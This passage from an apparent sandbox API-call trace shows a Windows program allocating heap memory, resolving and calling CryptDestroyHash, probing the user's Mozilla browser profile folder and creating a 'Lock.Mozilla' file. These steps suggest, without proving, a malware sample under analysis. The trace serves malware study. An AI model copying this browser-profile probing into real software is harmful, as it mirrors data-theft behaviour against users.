(HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0204.407] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0204.407] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0204.407] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0204.407] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa110 [0204.407] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa218 [0204.407] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0204.407] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0204.407] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0204.407] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16f8 [0204.407] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0204.407] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0204.408] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0204.408] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0204.408] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0204.408] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa218 | out: hHeap=0x25c0000) returned 1 [0204.408] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0204.408] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0204.408] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0204.408] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0204.408] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0204.408] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0204.408] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0204.408] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0204.408] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0204.408] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa110 [0204.408] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa218 [0204.408] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0204.408] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0204.408] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0204.408] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0204.408] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa218 | out: hHeap=0x25c0000) returned 1 [0204.409] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0204.409] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0204.409] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0204.409] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0204.409] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9bd0 | out: hHeap=0x25c0000) returned 1 [0204.409] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0204.409] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9bd0 [0204.409] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0204.409] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa110 [0204.409] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0204.409] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa218 [0204.409] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0204.409] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0204.409] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0204.409] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0204.409] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0204.409] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0204.409] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0204.409] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0204.410] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0204.410] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0204.410] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0204.410] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0204.410] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1788 [0204.410] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0204.410] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0204.410] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0f8 [0204.410] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18c8 [0204.410] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17a8 [0204.410] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0204.410] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0204.410] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0204.410] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0204.410] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0204.410] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0204.410] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17a8 [0204.410] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0f8 [0204.410] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18c8 [0204.411] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16f8 [0204.411] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0204.411] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0204.411] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0204.411] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0204.411] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0204.411] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0204.411] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16f8 [0204.411] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0204.411] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x2466dd0, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0204.411] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0204.411] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0204.411] GetProcAddress (hModule=0x74d40000, lpProcName="CryptDestroyHash") returned 0x74d4df66 [0204.411] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ba0 | out: hHeap=0x25c0000) returned 1 [0204.412] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0204.412] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0204.412] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0204.412] CryptDestroyHash (hHash=0xaa5660) returned 1 [0204.412] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0204.412] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0204.412] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0204.412] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0204.412] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0204.412] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0204.412] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0204.412] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0204.412] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0204.412] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0204.412] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0204.412] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0204.412] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9bd0 | out: hHeap=0x25c0000) returned 1 [0204.412] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0204.413] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa218 | out: hHeap=0x25c0000) returned 1 [0204.413] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0204.413] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0204.413] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0204.413] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0204.413] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0204.413] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0204.413] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0204.413] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0204.413] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416270 | out: hHeap=0x25c0000) returned 1 [0204.413] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0204.413] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0204.413] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0204.413] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d98 | out: hHeap=0x25c0000) returned 1 [0204.413] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0204.413] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0204.413] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0204.413] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b88 | out: hHeap=0x25c0000) returned 1 [0204.413] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0204.414] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0204.414] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0204.414] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0204.414] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0204.414] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f00 | out: hHeap=0x25c0000) returned 1 [0204.414] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0204.414] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0204.414] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0204.414] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0204.414] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0204.414] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0204.414] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0204.414] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0204.414] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0204.414] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0204.414] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0204.414] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0204.414] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0204.414] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0204.415] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0204.415] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0204.415] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0204.415] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0204.415] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0204.415] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0204.415] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0204.415] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0204.415] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0204.415] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d00 | out: hHeap=0x25c0000) returned 1 [0204.415] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0204.415] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c18 | out: hHeap=0x25c0000) returned 1 [0204.415] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0204.415] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0204.415] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f200 | out: hHeap=0x25c0000) returned 1 [0204.415] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0204.415] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0204.415] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0204.415] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0204.416] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6468 | out: hHeap=0x25c0000) returned 1 [0204.416] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0204.416] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0204.416] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0204.416] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6508 | out: hHeap=0x25c0000) returned 1 [0204.416] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0204.416] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6af8 | out: hHeap=0x25c0000) returned 1 [0204.416] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0204.416] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0204.416] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0204.416] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0204.416] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0204.416] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0204.416] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0204.416] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0204.416] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416490 | out: hHeap=0x25c0000) returned 1 [0204.416] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0204.416] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0204.416] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0204.416] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ab0 | out: hHeap=0x25c0000) returned 1 [0204.417] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa170 | out: hHeap=0x25c0000) returned 1 [0204.417] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0204.417] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0204.417] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cd8 | out: hHeap=0x25c0000) returned 1 [0204.417] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0204.417] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a30 | out: hHeap=0x25c0000) returned 1 [0204.417] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0204.417] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0204.417] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0204.417] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0204.417] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0204.417] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3cb8 | out: hHeap=0x25c0000) returned 1 [0204.417] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0204.417] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a80 | out: hHeap=0x25c0000) returned 1 [0204.417] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0204.417] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0204.417] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0204.417] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0204.417] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0204.417] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0204.417] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0204.418] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0204.418] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0204.418] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0204.418] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0204.418] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz/AppData/Roaming/Mozilla" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0204.418] GetLastError () returned 0x5 [0204.418] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0204.418] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0204.418] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0204.418] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz/AppData/Roaming/Lock.Mozilla" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\lock.mozilla"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2a0 [0204.419] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0204.419] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0204.419] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0204.419] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | 